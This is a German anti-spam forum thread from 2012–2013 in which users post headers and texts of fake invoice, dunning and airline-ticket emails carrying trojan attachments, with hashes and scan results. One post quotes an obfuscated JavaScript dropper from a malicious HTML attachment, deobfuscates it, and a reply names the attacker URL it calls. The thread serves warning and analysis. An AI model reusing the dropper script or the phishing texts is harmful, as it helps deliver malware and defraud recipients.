Schmidt-Online GmbH Arnstein
ist weiterhin aktiv. Welcher Trojaner
in der sogenannten Rechnung drin ist,
wurde allerdings bei web.de nicht angezeigt.
Aber bei dem Betrag von 775,21 werden sicher
einige aufgeschreckt draufklicken.

Hab das Knopferl nicht gefunden, womit ich
den Header hier einfügen könnte, falls es nötig wäre. :o

homer
28.11.2012, 11:50
Hab das Knopferl nicht gefunden, womit ich
den Header hier einfügen könnte, falls es nötig wäre. :o
Das Tag ist: ... . Button is nich, selber tippen!

cmds
28.11.2012, 11:54
Alle weiteren Codes, die nicht im Editor mit Button realisiert sind, sind hier zu finden

BBCode (https://www.antispam-ev.de/forum/misc.php?do=bbcode)

4479

Baldrian
28.11.2012, 11:59
Danke für die Info.
Habe es hier eingefügt.

Return-Path: mahnstelle [at] schmidt-online.de
Received: from [85.114.128.67] ([127.0.0.1]) by g067.green.fastwebserver.de with Microsoft SMTPSVC(7.5.7600.16385); Sun, 25 Nov 2012 23:05:48 +0100
Received: from g067.green.fastwebserver.de ([85.114.128.67]) by mx-ha.web.de (mxweb106) with ESMTP (Nemesis) id 0LonFX-1TZT07326t-00gehF for <xxx [at] web.de>; Tue, 28 Aug 2012 23:05:12 +0200
Message-Id: <UORF1VR5-VHS8-QRXB-F3Q-8X7SU37P76Y [at] Schmidt-Online.de>
Mime-Version: 1.0
From: Schmidt-Online GmbH <mahnstelle [at] Schmidt-Online.de>
To: xxx [at] web.de
Subject: Rechnung 28.08.2012 - Schmidt-Online GmbH
Date: Sun, 25 Nov 2012 23:05:55 +0100
X-Bounce-Tracking-Info: <CQkJZWRpdGgudGhhaXNzQHdlYi5kZQlSZWNobnVuZyAyOC4wOC4yMDEyIC0gU2NobWlkdC1PbmxpbmUg R21iSAkxMwkJMjM4MDMxCWJvdW5jZQlubwlubw==>
Content-Type: multipart/mixed; boundary="--=BOUNDARY_1125235_GXFA_AOCS_IUYY_UQEB"
X-OriginalArrivalTime: 25 Nov 2012 22:05:57.0927 (UTC) FILETIME=[0C1B8370:01CDCB59]
Envelope-To: <xxx [at] web.de>
X-UI-Filterresults: ;V01:K0:2TTc+07E:HRkIQNRvZNCU6wdJvCPbExkSCCg81I/HG8y 0yNt3ynd7QxRUk8VltoQq/aL9ggK0Aru4YIvLdlIZc6O/k2TAFe6yiACloArVTYDbHqrpxk w=

deekay
16.01.2013, 11:24
Neues Jahr, neue Runde....

X-Envelope-From: <c_r_a_z_y_f_l_o [at] web.de>
X-Envelope-To: <i^^^^@^^^^.de>
X-Delivery-Time: 1358330776
X-UID: 44832
Return-Path: <c_r_a_z_y_f_l_o [at] web.de>
X-RZG-FWD-BY: ^^^^@^^^^^^.de
Received: from mailin.rzone.de (jored mi36) ([unix socket])
by mailin.rzone.de (jored mi36) (RZmta 31.12) with LMTPA;
Wed, 16 Jan 2013 11:06:00 +0100 (CET)
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received: from mout.web.de ([212.227.15.4])
by mailin.rzone.de (jored mi36) (RZmta 31.12 OK)
with ESMTP id A0070bp0G9dwip for <^^^^@^^^^^^.de>;
Wed, 16 Jan 2013 11:06:00 +0100 (CET)
Received: from PackardBell-PC ([145.53.174.4]) by smtp.web.de (mrweb003) with
ESMTPSA (Nemesis) id 0MbhSP-1TcvWK2k6f-00IjWY for <^^^^@^^^^^^.de>;
Wed, 16 Jan 2013 11:05:59 +0100
From: <c_r_a_z_y_f_l_o [at] web.de>
To: "Daniel Klxxxx" <^^^^@^^^^^^.de>
Subject: Daniel Kxxx, Mahnbescheid Nr.: 4408613030
Date: Wed, 16 Jan 2013 10:05:24 GMT

Guten Tag lieber Kunde/Kundin Dxxxxx Klxxxxxx

Aktennummer: AZ85635719
Kundennummer: 26146156 Dxxxxxx Kxxxxxxxx


in aufgeführter Angelegenheit haben wir Sie schon mehrfach schriftlich zur Zahlung aufgefordert und auf die sehr schwere Folgen einer Nichtzahlung hingewiesen. Bis jetzt ist keine Zahlung eingegangen.

Wir hatten bereits angekündigt, den Saldo an verschiedene Wirtschaftsauskunfteien zu melden, die Voraussetzungen nach dem BDSG sind erfüllt.
Im weiterem Verlauf werden wir beim zuständigen Gericht einen gerichtlichen Mahnbescheid gegen Sie beantragen und anschließend die Zwangsvollstreckung durchführen lassen. Dadurch entstehen weitere hohe Kosten und Schwierigkeiten für Sie.

Rechnungseinzelheiten und Widerspruch Hinweise finden Sie in beigefügtem Anhang.

Die Bestellnummer: 74632319236 bei Primustronix AG 552,55 EU

Bitte ersparen Sie sich weitere Unannehmlichkeiten und Kosten und begleichen Sie umgehend die beigefügte Rechnung.

Mit verbindlichen Grüßen

WeberNet GmbH
Annaberg-Buchholz
DE3033715588
Pxxxx Hxxx

markusg
16.01.2013, 14:50
hatt mir heut auch einer der Nutzer des Trojaner boards gesendet, ist der sogenannte Verschlüsselungstrojaner mit nem Backdoor.

Mittwoch
21.01.2013, 16:10
Received: from 203-156-233.mclink.it (adsl203-156-233.mclink.it [213.203.156.233])
by mx.kundenserver.de (node=mxeu0) with ESMTP (Nemesis)
id 0M9qxA-1TmEYZ1LFw-00BRWn for schipp [at] schnapp.tld; Mon, 21 Jan 2013 14:13:24 +0100
Return-Path: <online [at] booking-lufthansa.com>
Received: from mail.pcsoffice02.de (mail.pcsoffice02.de [213.61.9.130]) by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis) id 0MSsSL-1ToYkn2F0v-00SadK for <schnipp [at] schnapp.tld>; Mon, 21 Jan 2013 14:13:17 +0100
Received: from booking-lufthansa.com ([213.61.9.129]) (authenticated user online [at] booking-lufthansa.com) by mail.pcsoffice02.de for <schnipp [at] schnapp.tld>; Mon, 21 Jan 2013 14:13:17 +0100


Falls Sie diese Reiseinformation nicht oder nur teilweise lesen konnen, offnen Sie bitte die angehangte PDF-Version. Bitte antworten Sie nicht auf diese E-Mail. Direkt-Antworten an den Absender konnen nicht bearbeitet werden. Um mit Lufthansa in Kontakt zu treten, rufen Sie bitte den Hilfe &amp; Kontakt-Bereich auf www.lufthansa.com auf.

Buchungscode:N13FFJ

Flugscheindetails & Reiseinformationen in der beigefugten Datei

* Den Passenger Receipt (Rechnungsbeleg) erhalten Sie durch einen Klick auf die Flugscheinnummer bis 30 Tage nach Reisebeginn.

Deutsche Lufthansa AG

Die Beforderung unterliegt den Beforderungsbedingungen fur Fluggaste und Gepack der Lufthansa. Die Deutsche Lufthansa haftet nicht fur von Ihnen oder Dritten vorgenommene Veranderungen der ubermittelten Daten. Alle Angaben ohne Gewahr.
Bei den angegebenen Zeiten handelt es sich um Ortszeiten.

Sitz der Gesellschaft:Deutsche LufthansaAktiengesellschaft, KolnRegistereintragung:Amtsgericht KolnHR B 2168Vorsitzender des Aufsichtsrats: [schnippschnapp]
Der Mail hängt eine "Flugscheindetails.zip" an, die – wen wundert's – ziemlich virenverseucht ist, siehe zum Beispiel Virustotal.com (https://www.virustotal.com/file/ca63b256527b1767b7fe5e36e1a98ddf59a57c9cb55784f9e4ce82d21e9228c3/analysis/). Die letzten beiden Headerzeilen sind mit Sicherheit gefälscht. Tatsächlich kommt die Mail nicht von der Lufthansa, sondern wurde über einen italienischen Dialin-Zugang abgworfen (213.203.156.233 bzw. adsl203-156-233.mclink.it); vermutlich ein Zombie.

Also: Finger weg!
Schönen Gruß
Mittwoch

erdbeernase
21.01.2013, 17:23
Received: from [193.230.193.130] (unknown [193.230.193.130])
by xxx.xxx.xxx (Postfix) with ESMTP id 978B85F61DD7
for <xxx [at] xxx.xxx>; Mon, 21 Jan 2013 14:16:09 +0100 (CET)
Received: from mail.pcsoffice02.de (mail.pcsoffice02.de [213.61.9.130]) by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis) id 0MSsSL-1ToYkn2F0v-00SadK for <xxx [at] xxx.xxx>; Mon, 21 Jan 2013 15:16:09 +0200
Received: from booking-lufthansa.com ([213.61.9.129]) (authenticated user online [at] booking-lufthansa.com) by mail.pcsoffice02.de for <xxxl [at] xxx.xxx>; Mon, 21 Jan 2013 15:16:09 +0200
Message-ID: <530104-0310265182621676842 [at] booking-lufthansa.com>
From: "Lufthansa.com" <online [at] booking-lufthansa.com>

Jackie78
23.01.2013, 17:20
Hallo,

da ich bei Google nichts derartiges gefunden habe, dachte ich, ich poste das mal hier. Ist es möglich, dass bei einer Onlineapotheke (ich bestelle desöfteren bei diversen für meine Mutter, allerdings noch nie bei Sanicare) Daten entwendet wurden? Jedenfalls werde ich mit dem Korrekten Namen angespochen, der Rest ist allerdings blanker Unsinn.

Der Mail hängt ein ZIP-Archiv an, in der ein weiteres ZIP-Archiv enthalten ist, und in diesem wiederum eine .com-Datei (ausführbare Datei). Soll wohl diverse Virenscanner irritieren.

Hier mal der Klartext und Header:

Return-Path: leonskuddis [at] web.de
Received: from mout.web.de ([212.227.17.12]) by mx-ha.gmx.net (mxgmx010) with
ESMTP (Nemesis) id 0LkTRj-1TLceg2bCV-00cTii for <************@gmx.de>; Wed,
23 Jan 2013 13:47:45 +0100
Received: from thomas-383f5ec1 ([91.40.29.3]) by smtp.web.de (mrweb001) with
ESMTPSA (Nemesis) id 0Mg7Zl-1TaXRJ33MD-00NaAl for <************@gmx.de>; Wed,
23 Jan 2013 13:47:44 +0100
From: <leonskuddis [at] web.de>
To: "**** ********" <************@gmx.de>
Subject: 23.01.2013 **** ******** Letzte Mahnung Nr. 29767
Date: Wed, 23 Jan 2013 12:48:00 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC1094844F"
Message-ID: <0M9oW8-1Tn1NQ3zom-00BCc2 [at] smtp.web.de>
X-Provags-ID: V02:K0:LZgh+gJ0mSE7LNcWKTpXGROXBxHBTZYdbyPKIouyv8/
0M2z6j2oQus+pextLpoIeXYupcXTfKw70bBcG6h/P3VGEHp8H3
LIwyu1xy3HnHIIPzPgpxZ4P4+xiV3wUKygJ+KNFxGzVjMrQt8n
ztjYEu+ICKRj52sstPwpLKzASvGrtEKEdNAAyyhA13WvYYiyGy
haKX9IHL9muIpfvqVRgYQ==
Envelope-To: <************@gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;V01:K0:UimAAxO0KwQ=:skYOMea4tNRFMuEgweRf9K...






Sehr geehrte/r **** ********,

leider haben Sie auf unsere schriftliche Zahlungserinnerung vom 19.01.2013 nicht reagiert, so dass der fällige Betrag aus der Rechnung 30241001 vom 22.12.2012 von Ihnen noch nicht überwiesen wurde.

Deine Bestell-Nummer: 82449048928 bei www.sanicare.de 592,90 Euro Lieferung bestätigt von: **** ********

Wir verpflichten Sie daher den fälligen Betrag binnen 6 Tagen ohne Abzug auf das in der Anlage genannte Konto zu überweisen.

Im beigefügtem Dokument sehen Sie Ihre Rechnung und andere Einzelheiten Ihrer Bestellung.

Bei Rückfragen können Sie sich an unseren Kundenservice unter 0900 - 17 518 62623 (1,29 Euro/Min dt. Festnetz) wenden.
Sollte auch diese Zeitfrist ohne eine Zahlung verstreichen, so werden wir die Zahlung an unsere Anwälte zur professionellen Einforderung übergeben.
Wir möchten Sie darauf hinweisen, dass wir alle Zahlungseingänge bis zum 23.01.2013 berücksichtigt haben.

Bitte lassen Sie uns wissen, ob wir Ihnen noch weiter behilflich sein können.

Mit freundlichen Grüßen

Ihre Kundenbetreuung
Germany Hamburg
Teresa Ropke

radan
23.01.2013, 17:27
Hier auch aufgeschlagen; ich gehe davon aus, dass der Anhang verseucht ist und es schon ein Fehler war, diesen überhaupt zu öffnen.

Jackie78
23.01.2013, 17:31
Hier auch aufgeschlagen; ich gehe davon aus, dass der Anhang verseucht ist und es schon ein Fehler war, diesen überhaupt zu öffnen.

Naja, das ZIP zu öffnen dürfte harmlos sein, solange du die .COM Datei nicht ausführst.

Jackie78
23.01.2013, 18:57
Habe das Sample (Anhang) mal an diverse Antivirenhersteller gesendet, Virustotal erkennt leider noch seht wenig:
https://www.virustotal.com/file/966eff35422dc9516e46a86096909c15d3fd434eb930d8d22f7b117fdd4876f1/analysis/1358963583/


War bei euch derselbe Anhang dabei?

kjz1
23.01.2013, 20:32
@Mods:
Sollte man den Viren-Unter-Thread nicht besser abtrennen und nach 1.4 verschieben?

Juli
05.02.2013, 23:12
Zur Diskussion: (Die Fa. brands... kannte ich bisher noch nicht):

"Von: a_hoffmann8x8Xweb.de
Sehr geehrter Kunde xxxxx,
zum Unglück war der Einzug mittels Lastschrift von Ihren angegebenen Konto nicht machbar oder es wurde eine Rücklastschrift veranlaßt, für die Unkosten von xx,xx EUR berechnet sind.
Die Bestellnummer: xxxxxxxxxxx bei www.brands4friends.de 9xx,xx Euro
Lieferung an: xxxxx
Wir geben Ihnen Gelegenheit die Summe inklusive der Gebühren für die Rückbuchung bis zum 14.02.2013 an uns zu überweisen. Sonst sehen wir uns gezwungen, ein Betreibungsverfahren in die Wege zu leiten.
Artikeleinzelheiten und Widerruf Erklärung finden Sie in beigefügtem Anhang.
Bitte beachten Sie, dass kein postalischer Versand der Unterlagen erfolgt!
Mit besten Grüßen
Ihre Kundenbetreuung Online
Ralf Zimmerman"
Anhang: ZIP-Datei „Infos-Mahnungxx.02.2013.xxx“

Rava Telladeon
07.02.2013, 22:13
Return-Path: meine.babs [at] web.de
Received: from mout-xforward.web.de ([82.165.159.34]) by mx-ha.gmx.net
(mxgmx004) with ESMTP (Nemesis) id 0M4T6q-1UrGMe3WlI-00ylkh for
<xxxxx [at] gmx.de>; Thu, 07 Feb 2013 20:44:08 +0100
Received: from 000-PC ([178.8.211.213]) by smtp.web.de (mrweb103) with ESMTPSA
(Nemesis) id 0Lal6K-1UnukP0tqq-00kSW5 for <xxxx [at] gmx.de>; Thu, 07
Feb 2013 20:44:08 +0100
From: <meine.babs [at] web.de>
To: "xxxx" <xxxx [at] gmx.de>
Subject:xxxx Zweite Abmahnung Ihrer Bestellung Kundennummer: 428557379001
Date: Thu, 7 Feb 2013 19:43:35 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XCA2FD1D75"
Message-ID: <0Ljrlt-1UfMFF0Coz-00btwa [at] smtp.web.de>
X-Provags-ID: V02:K0:AM+Ekf4hwF6l4u/9LaV1B8WTV2WQXhe3p4j1kRv068w
hqzdiC4/mtS+6p1hiHUj3wCLF19ALAfc0nVNzLVsJdvd5wXucn
AXnKZ+q2UtC8f0OVJLj019Tm9s+Fu+SbOy6lHmpaVuWC105Pq6
y+1Y6C9TNuIwamW8hrqk9DY7HwCT0GMrxkbT2XUpeWdi3eF95Y
0vQdU3F4flAYioOGqtoSg==
Envelope-To: <xxxxx [at] gmx.de>
X-GMX-Antispam: 6 (nemesis text pattern profiler); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: junk:10;V01:K0:nI7Ld2nyLfI=:7OKqVaAy7IE/cfSqefswRXKX
fn2sdWbad7Y89bQf9mm+VZDFlztGhrGUCFgHzt/AEyICeQ3Id8yYQEcoA086nnfy1I/TH95
vWpRGClXpoxd1r58F+St47FBXlBOuBu2YbGX2+Va+7zhyIoWNzl3BYmC7khnWqPoi/rv7Vj
uomj1d+qXouZ+4zpWS++yMgKLbddgaCZ9/hY856k8hHH+afIMR5EW4AyVVFFSzoUGokKGxG
jjDcZJs7Vt71cmKRFYvLQXXfR96xtyt1fcWgW4PphGd1cmoJON7Hh2jGxYE4bugGzErcvRK
80220LZ7Ji9uJh5/ufY9RTRn/4BhIoPz1ScIbEQFU51W+Q35cdz/gzftNdJAOFkdJIz8BDP
rshuTCzAcfKLu3o7ohu7LizV33oVio4VOpkbyTPG7JNthvMCIF+xGco+HkjzO5gP4yy4ZDV
lLIWzvp4MqY8QVt6nIID4tQMPzjaDNSktcbL+/53PP29eoxFHnflL2Q9+vEbkp7vhTqEOJk
aWmmjYhWGNlnzDZNoXqzTSZllZV59bO/SKYodJJsQyOXOeEqP1OTiiOF7MGGhE5F/lRdKt1
MnUQSpiXM/f3pBn7Ll4sik6SD0ETS0wfDvdLOQHO2OWPqgqaTMHdERjFu5nPR1f2XjEzvUh
MmF6fJ5ekH4xd9vJMmCJ+DK1v02PTFkOtwURDl/YGSDoqmb+U+YtZb08I3aQQeqfWfwt5tE
kDsn7u96vp+Jw6tVkglnCaBvTAeEMN1m3LUjIFvLwlyD9u7VhOuv5Y5QyCgFxPppwAL+yYJ
JEvlTs4TfK5tQuoM/UpKj5leoyK2UNxLlNXb2es2GoNeYPjTFdqYJn4F8slAfsqTQ7JHsJH
no+QO8xV6779l5MSfaheAuoByxhBC0R21vbyEPRg4dKVXrqBZnGOXYat8LX+Z2d5QrTdMQq
U/wo/bXxCTYKB6h9HsaoXQKW4apAKLioUzobcZ9h7MtKt3+0JyJyC9n5AjzAIAoJRXPNOQ4
tKRbNpMcGxhAldt33u4C3CEPVs2Kw5R82xlBZg8dmhnjNT6yvJCzY94XV/czmi2w4BY8F+z
JCxBYZa7EjaV7LWvvsD+SD+hmCf+Ez1LQieSKHozPWG/NQt+596RHkixpXHkQbZ3qfhR7XC
Oz/UK11hWvsnGBDogZ7IahUGJZfO1aMW1QiF6NDnacRFwyymKzda9QsBreyPzQFAI+7Svo5
ik3+MS0fES5ige7jqFoWdi+65smpuchzwlVtf7/99yYTdgAUx0VwA2ySaV3wxFAbf30p1Di
VzNUpzFXvpyZ7wV74mM4g1AQoK79s8ZgXj5Jl8VAiyQUZdRD8vSF9ibOOIq73JfjwaxwNEf
nR3myikyEucnqKqJwq42gRwIbEa3pqCz2pI
X-GMX-UID: ODc1NJVVOyB3e7n4pmR3mjp3ZeX4lBdq
X-Flags: 1401


Interessant auch die Zeitangabe in Zeile 11...


Sehr geehrte/r X Y,

bedauerlicherweise war die Forderung mittels Lastschrift von Ihren angegebenen Bankkonto nicht erfolgreich oder es wurde eine Rückbuchung veranlaßt, für die Unkosten von 41,47 EUR entstanden sind.

Ihre Bestellnummer: 4955100092256 bei Computeruniverse AG
Rechnungs-Summe: 527,90 Euro X Y
Wir bitten Sie den nicht beglichenen Betrag binnen 3 Tagen ohne Abzug auf das in der Anlage genannte Konto zu überweisen. Sollte auch diese Zeitfrist ohne einen Zahlungseingang verstreichen, so werden wir die Zahlung an unsere Anwälte zur professionellen Einforderung geben.

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der Anlage sehen Sie Ihre Mahnung und andere weitere Details Ihrer Bestellung.


Information über Ihr 14-tägiges Rückgaberecht:
Sie können Ihre Bestellung innerhalb von 14 Tagen nach Erhalt der Lieferung ohne Begründung an die in der Rechnung genannte Adresse zurücksenden. Zur Fristwahrung genügt die rechtzeitige Absendung.

Mit verbindlichen Grüßen

Lina Vogt Leiter der Kundenbetreuung

Ich habe noch nie von einer Computeruniverse AG gehört. Die ganze Rechnung ist natürlich fiktiv um den Anwender unsicher und unkonzentriert zu machen.

Aber gutes fehlerfreies Deutsch, oder habe ich was übersehen?


Der Anhang ist eine ZIP, Datei
md5sum: 1ee929392bb7328775e59f0bbb224ed9 Mahnung Lieferung 06.02.2013 Versand .zip

in der wiederum befindet sich eine .com Datei,wahrscheinlich ein Trojaner.
md5sum: 5c2e6ae70f2431b738a9507a23ee7655 Mahnung Lieferung 06.02.2013 Versand .com

Dazu Google;

Es wurden keine mit Ihrer Suchanfrage - 5c2e6ae70f2431b738a9507a23ee7655 - übereinstimmenden Dokumente gefunden.

Habe die .com per virusscan.jotti.org/de scannen lassen:

Diese Datei wurde bereits geprüft. Die Ergebnisse des letzten Scans sind unten zu sehen.
[..]
Clam-AV PUA.Win32.Packer.Purebasic-1
Fortinet W32/Zbot.ANM!tr

Alle anderen Suchengines von jotti finden nix...

http://www.fortiguard.com/av/VID2619370 sagt:

W32/Zbot.ANM!tr is classified as a Trojan.

Trojan has the capabilities to remote access connection handling, perform Denial of Service (DoS) or Distributed DoS (DDoS), capture keyboard inputs, delete file or object, or terminate process.

The Fortinet Anti-Virus Analyst Team is currently in the process of creating a detailed description for this virus.

blizzy
08.02.2013, 07:28
Aber gutes fehlerfreies Deutsch, oder habe ich was übersehen?



Zum Beipiel:


war die Forderung mittels Lastschrift von Ihren angegebenen Bankkonto nicht erfolgreich

Wir bitten Sie den nicht beglichenen Betrag binnen 3 Tagen

und andere weitere Details

Mit verbindlichen Grüßen

Baldrian
08.02.2013, 12:37
Bekam heute eine eMail-Mahnung, mit zip-Datei.
Hätte noch 784 Euronen bei Mytoys offen.
Und wenn ich nicht sofort überweise, gehts an die Anwälte.
Da ich eine Meldung über 5 Fehlversuche auf diesem eMail-Account habe,
habe ich gleich mal mit Mytoys telefoniert. Kommt natürlich nicht von denen
und ist ihnen schon bekannt.
Ein Bekannter hatte das gleiche vor ein paar Tagen. Scheint jetzt wieder mal
ein neuer Abzock-Versuch zu sein.

cmds
08.02.2013, 13:41
... Scheint jetzt wieder mal
ein neuer Abzock-Versuch zu sein.
Abzocke = nein
Das ist ein Versuch, einen Trojaner (im Anhang der Mail) zu unterschieben.

Rava Telladeon
08.02.2013, 15:48
Zum Beipiel:

Du hast recht, und möglicherweise lesen die sogar hier mit :lil: und verbessern die nächste Version. xD :p

@Baldrian
Hat Deine .com Datei die gleiche md5sum? Wie sind die Dateinamen?
Ich denke die Namen kreieren die Black-Hacker mit einen Script so das stets aktuell aussehende Dateien entstehen.

Aber Vorsicht mit dem entpacken, Du darfst sie auf keinen Falle unter Windows XYZ ausführen!

Baldrian
08.02.2013, 18:17
Danke für die Warnung.
Ich entpacke solche Dateien grundsätzlich nicht.
Ausser es schickt mir ein Bekannter eine Datei, über die
wir zuvor gesprochen bzw. geschrieben haben.

Die Datei heisst: "Mein Name" Einzelheiten Ihrer Bestellung.zip

Ich bekomme blöderweise den Header nicht angezeigt.
Liegt vielleicht daran, dass ich die Mail in den Papierkorb geschoben habe.

markusg
08.02.2013, 19:52
Hi
vom Verschlüsselungstrojaner, um den es hier geht, gibts pro Tag um die 1-3 Variannten.
Aber die Infektionsraten scheinen gott sei dank nicht mehr so hoch zu sein wie im letzten Jahr, da hatte ich im Trojaner-board extrem viele Fälle zu bearbeiten.

Rava Telladeon
09.02.2013, 05:21
^
Kannst Du uns mal eine Thread URL (oder mehrere) hier mit rein kopieren damit dokumentiert ist wie es dann aussehen würde wenn jemand die .com gestartet hätte?

Danke.

Juli
09.02.2013, 18:27
Sorry, der Beitrag "Abmahnung_brands4friends(???)" gehört hierher:
https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung
Bitte verschieben MOD: [x] Erledigt
Grüße Juli

truelife
11.02.2013, 16:13
Hi schneite heute eine Mail für ein angebliches Flugticket für/von British Airways herein. Angeblich sei das Ticket angehängt. Diesmal - wie zu erwarten war - kein *.zip, sondern eine normale *.html-Datei, die man mit dem Browser öffnen sollte. Ich habe die mal mit dem Texteditor geöffnet. Der Textteil ist ziemlich langweilig:


Please wait... You will be forwarded...
Internet Explorer / Mozilla Firefox compatible only

Interessanter ist das beigefügte script:


<script>dbshre=245;try{window.document.body/=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4,113,88,106,43,55,113,88,106,42,53,5,96,94,33,1 12,92,105,41,54,55,113,88,106,43,35,27,114,92,104,93,112,100,93,103,110,41,99,10 3,92,91,111,96,103,103,55,29,95,108,109,106,53,38,39,94,106,100,88,102,104,101,1 00,93,38,107,111,53,47,40,49,42,42,93,103,107,111,104,38,100,98,104,102,106,39,9 2,105,103,108,101,103,40,107,95,104,27,53,120);s="";for(i=0;i-105!=0;i++){if(window.document)s+=ss["fro"+"mCha"+"rCo"+"de"](1*asgq[i]-(i%5-5-3-1));}
z=s;e(s);}}</script>

Hübscher (und lesbarer):


<script>
dbshre = 245;
try {
window.document.body /= 2
}
catch (gdsgsdg) {
if (dbshre) {
zaq = 0;
try {
v = document.createElement("div");
}
catch (agdsg) {
zaq = 1;
}
if (!zaq) {
e = eval;
}
ss = String;
asgq = new Array(109, 89, 107, 43, 56, 43, 49, 52, 4, 113, 88, 106, 43, 55, 113, 88, 106, 42, 53, 5, 96, 94, 33, 112, 92, 105, 41, 54, 55, 113, 88, 106, 43, 35, 27, 114, 92, 104, 93, 112, 100, 93, 103, 110, 41, 99, 103, 92, 91, 111, 96, 103, 103, 55, 29, 95, 108, 109, 106, 53, 38, 39, 94, 106, 100, 88, 102, 104, 101, 100, 93, 38, 107, 111, 53, 47, 40, 49, 42, 42, 93, 103, 107, 111, 104, 38, 100, 98, 104, 102, 106, 39, 92, 105, 103, 108, 101, 103, 40, 107, 95, 104, 27, 53, 120);
s = "";
for (i = 0; i - 105 != 0; i++) {
if (window.document) s += ss["fro" + "mCha" + "rCo" + "de"](1 * asgq[i] - (i % 5 - 5 - 3 - 1));
}
z = s;
e(s);
}
}
</script>

Ich habe keine Ahnung, was das Script macht - kann das jemand übersetzen?

Solli
11.02.2013, 16:57
So wie ich das sehe wird eine bestimmte Seite aufgerufen. Die URL steht aber sehr versteckt drin, nämlich als Zahlenwerte der einzelnen Buchstaben.

P.S.: Die URL lautet: http://epianokif.ru:8080/forum/links/column.php. Vorsicht, die Seite könnte Schadcode enthalten!

Katzina
15.02.2013, 12:00
Hallo zusammen,
leider bin ich hier ein absoluter "Userlaie", hatte heute eine Mail mit angeblicher Mahnung im Anhang, den ich nicht öffnete mit folgenden Angaben (ich kann leider diese Zeilen nicht so versiert aufschlüsseln, wie das hier im Forum üblich ist, vielleicht ist es auch schon an anderer Stelle erwähnt, dann bitte wieder löschen:

Return-Path: ***@gmx.net <xxxxx [at] web.de>; Fri, 15 Feb 2013 05:37:18 +0100
Received: from mailout-de.gmx.net ([10.1.76.29]) by mrigmx.server.lan (mrigmx002) with ESMTP (Nemesis) id 0MUiSQ-1UOv8k0VCO-00YAh0 for <xxxxx [at] web.de>; Fri, 15 Feb 2013 05:37:18 +0100
Received: (qmail invoked by alias); 15 Feb 2013 04:36:06 -0000
Received: from p57ABEB1A.dip.t-dialin.net (EHLO DIR_GLAAB) [87.171.235.26] by mail.gmx.net (mp029) with SMTP; 15 Feb 2013 05:36:06 +0100
X-Authenticated: #26635662
X-Provags-ID: V01U2FsdGVkX1/jY38nDS3jP9YDmidItHvd8pV0HR1CLVw+yi7aQS 3BY3739/XqUcES
From: <***@gmx.net>
To: <" Vorname, Name, meine Mailadresse>
Subject: =?utf-8?q?15.02.2013 Vorname, Name Mahngeb=C3=BChr Ihrer Bestellung Nummer 6335180?=
Date: Wed, 13 Feb 2013 05:21:32 GMT
MIME-Version: 1.0

Sehr geehrter Kunde ...Vorname, Name,

zum Unglück war die Forderung mittels Lastschrift von Ihren mitgeteilten Kontodaten nicht möglich oder es wurde eine Rücküberweisung zum Auftrag gegeben, für die Gebühren von 32,64 EUR entstanden sind.

Deine Rechnungsnummer: 86237903776 bei apomio
Rechnungs-Summe: 440,00 Euro
Lieferung bestätigt von: Vorname, Name

Wir geben Ihnen Gelegenheit den Betrag inklusive der Gebühren für die Rückbuchung bis zum 19.02.2013 an uns zu überweisen. Im anderen Fall sehen wir uns gezwungen, ein Gerichtsverfahren in die Wege zu leiten.

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der angehängten Datei sehen Sie Ihre Mahnung und andere Einzelheiten Ihrer Bestellung.


Besten Dank und freundliche Grüsse,
J. M. Leiter Online-Services
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC95DAF886"
X-Y-GMX-Trusted: 0

"apomio" kenne ich nicht, habe auch keine Kontodaten im Internet.
An alle hier viele Grüße, das Forum ist höchst interessant!

markusg
15.02.2013, 13:38
obwohl diese British Airways mails nichts mit den fake Rechnungen gemein haben, verteilen beide unterschiedliche Schadsoftware.

Smart
15.02.2013, 14:09
Sehr geehrter Kunde ...Vorname, Name,

zum Unglück war die Forderung mittels Lastschrift von Ihren mitgeteilten Kontodaten nicht möglich oder es wurde eine Rücküberweisung zum Auftrag gegeben, für die Gebühren von 32,64 EUR entstanden sind.

Deine Rechnungsnummer:

Bitte nehmen Sie sich einen kleinen Moment Zeit, um Ihre Auftragsdetails zu überprüfen.
In der angehängten Datei sehen Sie Ihre Mahnung und andere Einzelheiten Ihrer Bestellung.


"apomio" kenne ich nicht, habe auch keine Kontodaten im Internet.
An alle hier viele Grüße, das Forum ist höchst interessant!

Bei solchen Mail s müssen sofort die Warnlampen angehen.

1. Die schreiben : Deine Rechnungsnummer
2. Dann: Bitte nehmen Sie sich
3. Dann eine Angehängte Datei.

Katzina
15.02.2013, 16:44
Danke Smart, "Lampen" gingen auf :D

Hippo
15.02.2013, 17:44
Sascha vom Nachbarforum hat da einen > Artikel < (http://www.computerbetrug.de/2013/02/offene-rechnung-neue-welle-von-trojaner-mails-uberrollt-deutschland-7352/) dazu geschrieben

Mittwoch
22.02.2013, 01:49
Gerade frisch eingetroffen:

Return-Path: <besiegerswmdj576 [at] telekom.de>
Received: from simpso13.lnk.telstra.net (simpso13.lnk.telstra.net [120.151.5.222])
by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis)
id *** for lah [at] blubb.tld; Thu, 21 Feb 2013 21:35:20 +0100
Received: from [212.82.199.114] (account diezt6 [at] telekom.de HELO nyigrd.nxoeappjwr.org)
